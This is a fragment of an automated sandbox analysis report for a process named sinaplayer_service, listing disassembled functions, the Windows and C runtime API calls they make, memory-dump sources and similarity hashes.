                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@$??3@Base@12@@Base@subtle@base@@BindCountedFileLocation@tracked_objects@@Path@base@@SafeStateTaskThread$Callback@$$Counter@tracked_objects@@D@2@@std@@D@std@@PostProgramReply@Runner@base@@U?$char_traits@Unsafe@V012@@V01@@V?$allocator@V?$basic_string@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::OpenAsync$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 3746277702-641225901
                                                                                                                                                                                                    • Opcode ID: 3715c7d507a244b159b1ba9cf59165dbd8a5021fecb903b17133c7524a87755f
                                                                                                                                                                                                    • Instruction ID: 626f9cebeada63aba5b4b14b6d0a192caa61330bb1339747f64cf6667bc41c1a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3715c7d507a244b159b1ba9cf59165dbd8a5021fecb903b17133c7524a87755f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0215E72904248AFDB02DF98DC45AEFBBBCEB05714F10415AF825A7281D775AA04CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??2@YAPAXI@Z.MSVCR120(00000018), ref: 00387BBF
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 00387BDA
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@QAE@ABV012@@Z.BASE(?), ref: 00387BFE
                                                                                                                                                                                                      • Part of subcall function 00387B90: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 00387C15
                                                                                                                                                                                                      • Part of subcall function 003878E0: ??2@YAPAXI@Z.MSVCR120(00000020), ref: 0038790F
                                                                                                                                                                                                      • Part of subcall function 003878E0: ??0RefCountedThreadSafeBase@subtle@base@@IAE@XZ.BASE ref: 0038792A
                                                                                                                                                                                                      • Part of subcall function 003878E0: ??0CallbackBase@internal@base@@IAE@PAVBindStateBase@12@@Z.BASE(00000000), ref: 0038796B
                                                                                                                                                                                                    • ?GetProgramCounter@tracked_objects@@YAPBXXZ.BASE(00000000,00000000,?,?,?,?,?,8285FFAB), ref: 00388D52
                                                                                                                                                                                                    • ??0Location@tracked_objects@@QAE@PBD0HPBX@Z.BASE(net::FileStream::Context::SeekAsync,network_change\file_stream_context.cc,00000085,00000000,?,?,?,?,?,8285FFAB), ref: 00388D6B
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??2@YAPAXI@Z.MSVCR120(00000010,8285FFAB,?,?,0039B128,000000FF,?,0038842B,?,00000000,?,?,?,8285FFAB), ref: 00387D29
                                                                                                                                                                                                      • Part of subcall function 00387D00: ?PostTaskAndReply@TaskRunner@base@@QAE_NABVLocation@tracked_objects@@ABV?$Callback@$$A6AXXZ@2@1@Z.BASE(0038842B,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF), ref: 00387D9D
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DB2
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B,?), ref: 00387DBB
                                                                                                                                                                                                      • Part of subcall function 00387D00: ??3@YAXPAX@Z.MSVCR120(000000FF,?,?,?,?,?,?,?,?,?,?,?,0039B128,000000FF,?,0038842B), ref: 00387DC0
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,8285FFAB), ref: 00388D88
                                                                                                                                                                                                    • ??1CallbackBase@internal@base@@IAE@XZ.BASE(?,?,?,?,?,?,?,?,?,8285FFAB), ref: 00388D94
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • network_change\file_stream_context.cc, xrefs: 00388D5E
                                                                                                                                                                                                    • net::FileStream::Context::SeekAsync, xrefs: 00388D63
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Base@internal@base@@Callback$??2@$Base@12@@Base@subtle@base@@BindCountedLocation@tracked_objects@@SafeStateTaskThread$??3@Callback@$$Counter@tracked_objects@@PostProgramReply@Runner@base@@V012@@Z@2@1@
                                                                                                                                                                                                    • String ID: net::FileStream::Context::SeekAsync$network_change\file_stream_context.cc
                                                                                                                                                                                                    • API String ID: 4200212630-3437824903
                                                                                                                                                                                                    • Opcode ID: 307a096f8c2e39a6a185ce755317de2be1c65d18ee34b4c347dc685089c9615c
                                                                                                                                                                                                    • Instruction ID: fe2a721bc83b5345708837f68be26f481ffb8472e979fee0e893b85594656c39
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 307a096f8c2e39a6a185ce755317de2be1c65d18ee34b4c347dc685089c9615c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C217F7290420CAFCB02DF94DD45ADFBBBCEB09714F10426AE821E7281D7759A04CBA1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(00000000,?,?,6C57CAB6), ref: 6C57CAC0
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,6C57CAB6), ref: 6C57CAF4
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000000,?,?,?,?,6C57CAB6), ref: 6C57CB02
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,00000000,00000000,?,?,?,?,6C57CAB6), ref: 6C57CB1A
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,6C57CAB6), ref: 6C57CB29
                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,6C57CAB6), ref: 6C57CB39
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide$_malloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3279498665-0
                                                                                                                                                                                                    • Opcode ID: f8600b03344b3fa489423ebc163ff1ae60515d44895d6fe210464c18eb8035db
                                                                                                                                                                                                    • Instruction ID: 2cb42e96aa3f18d0f56c389c9ef516095342426af87adacb69cc158308d064e2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8600b03344b3fa489423ebc163ff1ae60515d44895d6fe210464c18eb8035db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E119B76B05215BFEB306AB64C88C3B7B7CEB92259350092AFC0DD3540EB61DC8182B5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Lock@LockImpl@internal@base@@QAEXXZ.BASE(8285FFAB,00000000,6C6C56E0,00000000), ref: 0038A6FC
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038A714
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038A72B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038A747
                                                                                                                                                                                                    • ?Unlock@LockImpl@internal@base@@QAEXXZ.BASE ref: 0038A755
                                                                                                                                                                                                    • ??1LockImpl@internal@base@@QAE@XZ.BASE ref: 0038A761
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038A770
                                                                                                                                                                                                      • Part of subcall function 0038E840: EnterCriticalSection.KERNEL32(00000000,8285FFAB,?,?,00000000,00000000,00000000,0039BCE1,000000FF), ref: 0038E873
                                                                                                                                                                                                      • Part of subcall function 0038E840: LeaveCriticalSection.KERNEL32(00000000), ref: 0038E87E
                                                                                                                                                                                                      • Part of subcall function 0038E840: DisconnectNamedPipe.KERNEL32(?), ref: 0038E887
                                                                                                                                                                                                      • Part of subcall function 0038E840: Sleep.KERNEL32(0000000A), ref: 0038E8A1
                                                                                                                                                                                                      • Part of subcall function 0038E840: UnregisterWaitEx.KERNEL32(?,000000FF), ref: 0038E8B1
                                                                                                                                                                                                      • Part of subcall function 0038E840: CloseHandle.KERNEL32(?), ref: 0038E8C5
                                                                                                                                                                                                      • Part of subcall function 0038E840: ??3@YAXPAX@Z.MSVCR120(?,00000001), ref: 0038E8EF
                                                                                                                                                                                                      • Part of subcall function 0038E840: ReleaseMutex.KERNEL32(?), ref: 0038E90C
                                                                                                                                                                                                      • Part of subcall function 0038E840: CloseHandle.KERNEL32(?), ref: 0038E915
                                                                                                                                                                                                      • Part of subcall function 0038E840: CloseHandle.KERNEL32(?), ref: 0038E922
                                                                                                                                                                                                      • Part of subcall function 0038E840: DeleteCriticalSection.KERNEL32(00000000), ref: 0038E925
                                                                                                                                                                                                      • Part of subcall function 0038E840: ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E93E
                                                                                                                                                                                                      • Part of subcall function 0038E840: ??3@YAXPAX@Z.MSVCR120(?), ref: 0038E94F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@$CloseCriticalHandleImpl@internal@base@@LockSection$DeleteDisconnectEnterLeaveLock@MutexNamedPipeReleaseSleepUnlock@UnregisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1533647037-0
                                                                                                                                                                                                    • Opcode ID: 7871e681c44bacf4f4edd7089f7f481c4eb115c82fc70042aab4614f13f60944
                                                                                                                                                                                                    • Instruction ID: 11cbd14ba194c68695da526a30cdfb4d62a36446d8a63f03b83a2a33217a0e18
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7871e681c44bacf4f4edd7089f7f481c4eb115c82fc70042aab4614f13f60944
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 582107B1A14744EBDF02DF68D88575ABBF8FF05304F0001AAE80987741D775AA14CBD2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00EB0000,00000000,6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000), ref: 6C55ED5D
                                                                                                                                                                                                    • __NMSG_WRITE.LIBCMT ref: 6C5ADA8F
                                                                                                                                                                                                    • _callnewh.MSVCR120(6C5CC0AD,00000000,?,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000), ref: 6C5ADAB3
                                                                                                                                                                                                    • _callnewh.MSVCR120(6C5CC0AD,00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000), ref: 6C5ADAD6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,6C56223C,6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000), ref: 6C5ADADC
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _callnewh$AllocHeap_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3215684309-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6C564F30,00000010), ref: 6C564E98
                                                                                                                                                                                                    • __doserrno.MSVCR120(6C564F30,00000010), ref: 6C5AE1BB
                                                                                                                                                                                                    • _errno.MSVCR120(6C564F30,00000010), ref: 6C5AE1C2
                                                                                                                                                                                                    • _errno.MSVCR120(6C564F30,00000010), ref: 6C5AE1F9
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6C564F30,00000010), ref: 6C5AE204
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2315031519-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator+$NameName::
                                                                                                                                                                                                    • String ID: throw(
                                                                                                                                                                                                    • API String ID: 168861036-3159766648
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __get_tlsindex.MSVCR120 ref: 6C5CC9AA
                                                                                                                                                                                                    • __crtFlsGetValue.MSVCR120(00000000), ref: 6C5CC9B0
                                                                                                                                                                                                    • __get_tlsindex.MSVCR120(?), ref: 6C5CC9BF
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,?), ref: 6C5CC9C5
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5CC9D0
                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 6C5CC9D7
                                                                                                                                                                                                    • _freefls.MSVCR120(?), ref: 6C5CC9F3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value__crt__get_tlsindex$ErrorExitLastThread_freefls
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 415173470-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,6C5A3F45,?), ref: 6C5CCA18
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C5CCA1F
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6C5CCA2B
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000001,6C5A3F45,?), ref: 6C5CCA48
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
• Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 3489934621-340411864
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,6C5A3F0C), ref: 6C5CCA70
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C5CCA77
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6C5CCA82
                                                                                                                                                                                                    • DecodePointer.KERNEL32(6C5A3F0C), ref: 6C5CCA9D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,00000000,00000000), ref: 6C578CAC
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?), ref: 6C578CBB
                                                                                                                                                                                                    • memset.MSVCR120(00000019,00000000,00000101), ref: 6C578CD3
                                                                                                                                                                                                    • setSBCS.LIBCMT ref: 6C5A75F0
                                                                                                                                                                                                    • memset.MSVCR120(00000019,00000000,00000101,00000000,00000000,00000000), ref: 6C5A7670
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memset$CodeInfoPageValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 344587817-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6C55F764: _getptd.MSVCR120(00000001,00000000,?,6C57E01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C55F77A
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6C633B90,6C5CC0DE), ref: 6C5DCF5A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6C633B90,6C5CC0DE), ref: 6C5DCF65
                                                                                                                                                                                                    • _stricmp_l.MSVCR120(00000001,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000,6C633B90,6C5CC0DE), ref: 6C5DCF7F
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,00000002,00000002,?,00000002,?,00000001,00000000,00000000,00000000,00000004,00000000,00000000,00000000), ref: 6C5DCFC2
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000200,00000000,00000002,?,00000002,?,00000001,?,?,?,?,?,00000000,00000000), ref: 6C5DD04D
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000001,?,00000000,00000000), ref: 6C5DD0B6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String__crt_errno$_getptd_invalid_parameter_noinfo_stricmp_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1992914148-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,?), ref: 6C570923
                                                                                                                                                                                                    • _flsbuf.MSVCR120(00000000,?), ref: 6C57F7DB
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C58138C
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A587E
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_flsbuf_invalid_parameter_noinfomemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 508512864-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCMT ref: 6C5C29E4
